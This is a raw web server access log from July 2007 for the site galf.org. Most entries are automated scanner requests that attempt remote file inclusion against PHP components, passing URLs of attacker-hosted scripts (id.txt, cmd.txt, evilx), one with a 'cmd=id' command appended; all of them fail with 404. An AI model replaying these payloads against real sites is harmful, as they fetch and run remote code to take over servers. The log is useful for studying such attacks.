76.177.184.196 - - [15/Jul/2007:21:46:02 -0700] "GET /logs/index.php HTTP/1.1" 404 275 "http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
66.96.240.149 - - [15/Jul/2007:21:46:06 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.96.240.149 - - [15/Jul/2007:21:46:06 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.178.101.75 - - [15/Jul/2007:21:46:23 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 694248 "http://google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
64.53.199.44 - - [15/Jul/2007:21:46:36 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 196608 "http://google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
76.23.77.168 - - [15/Jul/2007:21:46:40 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 694248 "http://google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
66.96.240.149 - - [15/Jul/2007:21:46:44 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.96.240.149 - - [15/Jul/2007:21:46:44 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.255.201.175 - - [15/Jul/2007:21:46:51 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 694248 "http://google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
66.96.240.149 - - [15/Jul/2007:21:46:58 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.96.240.149 - - [15/Jul/2007:21:46:58 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.186.219.27 - - [15/Jul/2007:21:48:17 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 366080 "http://google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:21:48:52 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:21:48:53 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:48:56 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:48:56 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.208.91.108 - - [15/Jul/2007:21:48:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.208.91.108 - - [15/Jul/2007:21:48:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.100.65 - - [15/Jul/2007:21:49:24 -0700] "GET /logs/access.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
205.234.100.65 - - [15/Jul/2007:21:49:24 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.100.65 - - [15/Jul/2007:21:49:25 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:50:13 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:50:14 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.218.120 - - [15/Jul/2007:21:50:15 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.16.218.120 - - [15/Jul/2007:21:50:16 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:50:16 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:50:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:21:54:32 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:21:54:32 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:21:54:55 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:21:55:03 -0700] "GET /index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:56:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:56:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:59:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:21:59:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:59:16 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:59:16 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:59:27 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.199.58 - - [15/Jul/2007:21:59:27 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:00:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:00:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:22:01:56 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:22:01:57 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.73.154.222 - - [15/Jul/2007:22:03:42 -0700] "GET //index.php?go=http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.154.222 - - [15/Jul/2007:22:05:05 -0700] "GET /logs//index.php?go=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.154.222 - - [15/Jul/2007:22:05:05 -0700] "GET //index.php?go=http://www2.mayamo.net/store/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.141.148 - - [15/Jul/2007:22:05:28 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.141.148 - - [15/Jul/2007:22:05:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.141.148 - - [15/Jul/2007:22:05:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.233.105.52 - - [15/Jul/2007:22:06:56 -0700] "GET /logs/access.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gak-pake.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:22:07:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:22:08:25 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.227.215.80 - - [15/Jul/2007:22:09:32 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.labellos.de/components/com_forum/cache/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.215.80 - - [15/Jul/2007:22:09:32 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.labellos.de/components/com_forum/cache/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.247.2 - - [15/Jul/2007:22:10:10 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:22:12:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:13:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:13:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:16:29 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:16:37 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:16:45 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.216.252.246 - - [15/Jul/2007:22:22:57 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.246 - - [15/Jul/2007:22:22:57 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.152.199 - - [15/Jul/2007:22:24:43 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:26:38 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:26:38 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:22:27:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.142.103.75 - - [15/Jul/2007:22:28:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.142.103.75 - - [15/Jul/2007:22:28:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:28:24 -0700] "GET /logs/index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:28:24 -0700] "GET /index.php?open=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:22:30:23 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
205.234.100.65 - - [15/Jul/2007:22:30:54 -0700] "GET /logs/access.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.100.65 - - [15/Jul/2007:22:30:54 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
205.234.100.65 - - [15/Jul/2007:22:30:54 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://ulil.by.ru/a1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:33:46 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:33:47 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:33:53 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:33:54 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.114 - - [15/Jul/2007:22:43:36 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.19.190.150 - - [15/Jul/2007:22:44:37 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:44:38 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:44:41 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.19.190.150 - - [15/Jul/2007:22:44:41 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.221.184.234 - - [15/Jul/2007:22:46:32 -0700] "GET /logs/announcements.php?phpraid_dir=http://banksrealtors.com/tips? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.221.184.234 - - [15/Jul/2007:22:46:34 -0700] "GET /announcements.php?phpraid_dir=http://banksrealtors.com/tips? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.253.46.163 - - [15/Jul/2007:22:53:42 -0700] "GET /modules/My_eGallery/index.php?basepath=http://ucanlartemizlik.com/cmd.txt?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
212.241.212.211 - - [15/Jul/2007:22:54:38 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://jargo.phpnet.us/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.211 - - [15/Jul/2007:22:54:39 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://jargo.phpnet.us/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:22:56:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.165.8.173 - - [15/Jul/2007:23:06:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.165.8.173 - - [15/Jul/2007:23:06:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:06:09 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:06:18 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.90.118.254 - - [15/Jul/2007:23:06:18 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.90.118.254 - - [15/Jul/2007:23:06:18 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:11:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:12:11 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.17.204 - - [15/Jul/2007:23:12:19 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:12:20 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.18.44 - - [15/Jul/2007:23:12:24 -0700] "GET /logs/access.log HTTP/1.0" 200 95793 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:12:28 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.106.79.20 - - [15/Jul/2007:23:15:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.199.90 - - [15/Jul/2007:23:18:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.199.90 - - [15/Jul/2007:23:18:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.thomashamilton.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.149.136.238 - - [15/Jul/2007:23:19:20 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://vh1.srt.com.cn/sewam/ascmd.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
193.16.218.120 - - [15/Jul/2007:23:21:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.218.120 - - [15/Jul/2007:23:21:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:22:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.19.228.98 - - [15/Jul/2007:23:22:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.window-color-online.de/images/banners/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:23:23:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:23:23:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:23:25:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:23:25:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:23:27:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:23:27:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
